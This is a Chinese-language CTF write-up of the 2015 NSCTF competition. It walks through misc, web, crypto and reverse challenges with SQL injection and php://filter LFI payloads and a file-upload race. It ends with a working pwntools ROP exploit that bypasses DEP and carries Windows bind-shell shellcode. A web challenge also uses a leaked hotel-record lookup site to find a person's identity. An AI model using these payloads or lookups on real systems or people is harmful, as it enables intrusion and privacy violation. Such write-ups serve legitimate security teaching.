网络尖刀107团队:NSCTF绿盟西北高校网络安全攻防大赛Writeup

技术 作者:尖刀制造 2015-09-30 01:42:38
大赛简介 NSFOCUS-CTF是由绿盟科技研发中心主办,面向西北高校的网络安全技术攻防大赛,旨在普及网络安全知识,提高网络攻防意识,发现才华横溢的您,给予丰厚奖励以及Offer。   网络尖刀107团队也参加了本次比赛,虽然没有打进前十名,但NSCTF作为107团队的“处女赛”,无论是技术上还是团队合作上收获还是颇丰的。但以下是由107团队总结的Writeup,分享给大家。  

MISC:


  MISC1 NSCTF1NSCTF2 Flag:NSCTF_nsfocus666 MISC2 NSCTF2-1   NSCTF3 一个rar压缩包,winHex取出来另存一个rar 打开发现需要密码,回去看发现下载页 NSCTF4 密码是nsfocus+5位数字,生成字典爆破 NSCTF5 打开压缩包看到flag NSCTF6 flag{NCTF_R4r_Cr4ck} MISC3 NSCTF7 Card下载一个文件card,然后上传刷卡,卡里余额是96.4,题目提示是要把卡里的余额变为208 NSCTF8 要改为: NSCTF9 思路是:(a0zy给的提示)

 NSCTF10

Web:


  Web1 这题纯属运气,进去后发现没什么有用的信息,直接性ctrl+u查看源代码,也没什么,想看下链接的语言 试了下index.php  原来是从index.php跳到index。Html 嘿嘿 NSCTF11 Web2 你是谁 你从哪里来 你到哪里去 你是来自火星么? 知道是要改referer和xff但是不知道改成什么,最后在站友提示下做出来了 NSCTF12 101.200.73.168是www.nsctf.net  的IP NSCTF13 得到字符串,base64解密后得flag flag:{NSCTF_488b7a2dccd02a734165c39ba4517dbc} Web3 看返回包php版本,在看到post里面存在ver,尝试一下 http://www.nsctf.net:8002/fa81bb665474f11c025b5355582af315/web/03/?key=&ver=5.5.9-1ubuntu4.12 web4 有个password.txt,可以下载下来爆破,但想了一下,应该是个特殊的字符串吧,ctrl+f了下ns,找到两个,Nsf0cuS这个最像,直接提交不行,burp上提交可以,后来才看到,限制了位数,提交了找到一个cookie,base64解码后是个290bca70c7dae93db6644fa00b9d83b9.php 进去是小黑的留言板, NSCTF14 抓包修改post数据和cookie, 提交了个admin的不行 NSCTF15 试了很多,小黑,xiaohei,Xiaohei…后来想到系统是linux,试到root才出来。   Web5 Encode,和前几天做的scaw的一题很类似,直接写个decode NSCTF16 flag:{NSCTF_b73d5adfb819c64603d7237fa0d52977}   web6 Javascript 源文件js里找到这个 eval(unescape("var%20strKey1%20%3D%20%22JaVa3C41ptIsAGo0DStAff%22%3B% 0Avar%20strKey2%20%3D%20%22CaNUknOWThIsK3y%22%3B%0Avar%20strKey3%20% 3D%20String.fromCharCode%2871%2C%2048%2C%20111%2C%20100%2C%2033%29% 3B%0Aif%20%28uname%20%3D%3D%20%28strKey3%20+%20%28%28%28strKey1. toLowerCase%28%29%29.substring%280%2C%20strKey1.indexOf%28%220%22% 29%29%20+%20strKey2.substring%282%2C%206%29%29.toUpperCase%28%29% 29.substring%280%2C%2015%29%29%29%20%7B%0A%20%20%20%20var% 20strKey4%20%3D%20%27Java_Scr1pt_Pa4sW0rd_K3y_H3re%27%3B%0A%20% 20%20%20if%20%28upass%20%3D%3D%20%28strKey4.substring% 28strKey4.indexOf%28%271%27%2C%205% 29%2C%20strKey4.length%20-%20strKey4.indexOf%28%27_%27%29%20+%205% 29%29%29%20%7B%0A%20%20%20%20% 20%20%20%20alert%28%27Login%20Success%21%27%29%3B%0A%20%20%20%20%20% 20%20%20document.getElementById%28%27key%27%29.innerHTML%20%3D% 20unescape%28%22%253Cfont%2520color%253D%2522%2523000%2522% 253Ea2V5X0NoM2NrXy50eHQ%3D%253C/font%253E%22%29%3B%0A%20%20%20%20% 7D%20else%20%7B%0A%20%20%20%20%20%20%20%20alert%28%27Password% 20Error%21%27%29%3B%0A%20%20%20%20%7D%0A%7D%20else%20%7B%0A%20% 20%20%20alert%28%27Login%20Failed%21%27%29%3B%0A%7D"))   解密整理得: NSCTF17 截取出来执行 NSCTF18 获得uname和pass G0od!JAVA3C41PTISAGO 1pt_Pa4sW0rd_K3y_H3re   %3Cfont%20color%3D%22%23000%22%3Ea2V5X0NoM2NrXy50eHQ=%3C/font%3E解密整理得: NSCTF19 NSCTF20 访问得到有一个新链接接Ch3ck_Au7h.php 访问提示username错误。 http://www.nsctf.net:8000/fa81bb665474f11c025b5355582af315/web/06/ Ch3ck_Au7h.php?username= G0od!JAVA3C41PTISAGO&password=1pt_Pa4sW0rd_K3y_H3re还是错误,后来才想到解出来的是uname和pass http://www.nsctf.net:8000/fa81bb665474f11c025b5355582af315/web/06/ Ch3ck_Au7h.php?un ame=G0od!JAVA3C41PTISAGO&upass=1pt_Pa4sW0rd_K3y_H3r,拿到flag flag:{NSCTF_d7590edfdf8bcf958ced10cec94273ad} web7 social engeer 社工本来就不太擅长,是跟着队友提示着搞出来的 NSCTF21 因为没有字典生成工具,手写password, NSCTF22 NSCTF23 还好没写完就试了一次就有了,Xiaoming09231995 提交得到一个电话号13588342951 自己收藏的社工库查不到任何信息,队友提示了下找开房记录,百度了一个查开房记录的,输入后找到了姓名和身份证 NSCTF24 再一次耍了下中国式密码,没用,输生日没用,输了身份证号就出来了 flag:{NSCTF_3ad65730a8f203a5ab861169e9547f6d}   web8 LFI 目测是load file include,但是没多少思路,在一个群里(忘记了是不是官方交流群)看到别人发了这样一个: php://filter 搜了一下,找到这篇文章:http://forum.cnsec.org/thread-94335-1-1.html NSCTF25-1 这是格式,放在url上不行,直接放输入框中POST过去php://filter/read=convert.base64-encode/resource=index.php,成功了,读到index。Php的源码,bese64解密 NSCTF25 flag:{NSCTF_9bac7a6e289bf89ee0061bd0abdef0ab}   web9 不会 Web10 不会 Web11 File Upload 文件上传,是吧,但是传了就删,传了很多次,一台电脑传,一台电脑访问,都赶不到,最后队友告诉我,上传几千次才能成功一次,看来只有写脚本跑了, 经过一番努力,代码出来了! NSCTF26 还是不行,可能是上传和访问时间间隔还是大了,就在burp上构建了一个虚拟参数爆破,相当于重复一直上传,py脚本就只做一个事,检测访问状态为200,成功了!!! 先上传的一句话,但是上传成功就被删了,后来就想去读index.php,把上传内容改为 NSCTF27 NSCTF28 这样就出来了,感动哭! Web12 Sqli 测试username= admin%2527+and+1=1+--+和 admin%2527+order+by+1+--+成功但是加union select 1,2 就失败。后来队友提示可以用%a0代替空格,试了下,ok,普通注入, username=xx%27%a0union%a0select%a01,flag%a0from%a0flag%23获得flag  

Crypto:


  Crypto01 神奇的字符串 试了很多,最后先 ASE得到: flag{DISJV_Hej_UdShofjyed} 凯撒移位 {NSCTF_Rot_EnCryption}   Crypto02 神奇的图片 Kali下面foremost得到两张图片,另一张图片上 NSCTF29 Crypto03 神秘的图片+10086   用Stegsolve打开,发现好几个类似二维码的,都识别不了,自己制作了一个二维码,对比,发现好像颜色反了,取反色识别,果然是 NSCTF30 flag{NSCTF_Qr_C0De}    

Reverse:


  Reverse-1500分 107团队作出来来忘记提交,谁知那么早就结束来,错失了前十的位置,不过这边还把exp和思路贴一下,仅供大家学习参考。 思路:盲测fuzz -> 分析协议 -> 绕过 dep 附上exp:
#coding: utf-8 from pwn import * HOST = sys.argv[1]   conn = remote(HOST, 2994) conn.newline = "\r\n"   # get header conn.recv()   # get addr log.info("try to get the base addr") conn.sendline("STATUS") base = int(conn.recv().strip()[-10:], 16) log.success("base addr => {}".format(hex(base)))   # first encrypt, to get the table log.info("send the first packet, try to get the table") conn.sendline("ENCRYPT \x80\x00" + "A"*0x80) conn.recv(3) table_enc = conn.recv(0x80) table = [] for c in table_enc:      table.append(ord(c)^ord('A')) log.success("Table:") for c in table:      print hex(c), print   # second encrypt, exploit! log.info("send the second packet, try to exploit it") payload = "A" * 512   # save esp to eax, ebx payload += pack(base+0x1001) payload += pack(base+0x1004)   # point ebx to shellcode payload += pack(base+0x1015) payload += pack(base+0x1015) payload += pack(base+0x1015) payload += pack(base+0x1015) payload += pack(base+0x1015)   # point eax to parameter1 payload += pack(base+0x100e) payload += pack(base+0x100e) payload += pack(base+0x100e) payload += pack(base+0x100e) payload += pack(base+0x100e) payload += pack(base+0x3814) payload += pack(0x4) payload += pack(base+0x5c0a)   # modify parameter 1 payload += pack(base+0x1007)   # point eax to ret addr & modify ret payload += pack(base+0x100a) payload += pack(base+0x1007)   # call VirtualProtect payload += pack(base+0x101b)   payload += "AAAA" payload += "BBBB" payload += pack(0x200) payload += pack(0x40) payload += pack(0x00010000) payload += "\x90" * 200   # shellcode for bind shell payload += "\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b" payload += "\x50\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7" payload += "\x4a\x26\x31\xff\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf" payload += "\x0d\x01\xc7\xe2\xf2\x52\x57\x8b\x52\x10\x8b\x4a\x3c" payload += "\x8b\x4c\x11\x78\xe3\x48\x01\xd1\x51\x8b\x59\x20\x01" payload += "\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b\x01\xd6\x31" payload += "\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03\x7d" payload += "\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66" payload += "\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0" payload += "\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f" payload += "\x5f\x5a\x8b\x12\xeb\x8d\x5d\x68\x33\x32\x00\x00\x68" payload += "\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8" payload += "\x90\x01\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b\x00" payload += "\xff\xd5\x6a\x08\x59\x50\xe2\xfd\x40\x50\x40\x50\x68" payload += "\xea\x0f\xdf\xe0\xff\xd5\x97\x68\x02\x00\x11\x5c\x89" payload += "\xe6\x6a\x10\x56\x57\x68\xc2\xdb\x37\x67\xff\xd5\x57" payload += "\x68\xb7\xe9\x38\xff\xff\xd5\x57\x68\x74\xec\x3b\xe1" payload += "\xff\xd5\x57\x97\x68\x75\x6e\x4d\x61\xff\xd5\x68\x63" payload += "\x6d\x64\x00\x89\xe3\x57\x57\x57\x31\xf6\x6a\x12\x59" payload += "\x56\xe2\xfd\x66\xc7\x44\x24\x3c\x01\x01\x8d\x44\x24" payload += "\x10\xc6\x00\x44\x54\x50\x56\x56\x56\x46\x56\x4e\x56" payload += "\x56\x53\x56\x68\x79\xcc\x3f\x86\xff\xd5\x89\xe0\x4e" payload += "\x56\x46\xff\x30\x68\x08\x87\x1d\x60\xff\xd5\xbb\xf0" payload += "\xb5\xa2\x56\x68\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c" payload += "\x0a\x80\xfb\xe0\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00" payload += "\x53\xff\xd5"   # xor payload offset = '' for i in xrange(len(payload)):      offset += chr(ord(payload[i])^table[i%128]) conn.sendline('ENCRYPT \xf0\x08'+offset)   # close the connection conn.close()   # interact conn = remote(HOST, 4444) log.success("enjoy!") conn.interactive(prompt="") conn.close()
Snip20150930_2 整理编辑:iDer

关注公众号:拾黑(shiheibook)了解更多

[广告]赞助链接:

四季很好,只要有你,文娱排行榜:https://www.yaopaiming.com/
让资讯触达的更精准有趣:https://www.0xu.cn/

公众号 关注网络尖刀微信公众号
随时掌握互联网精彩
赞助链接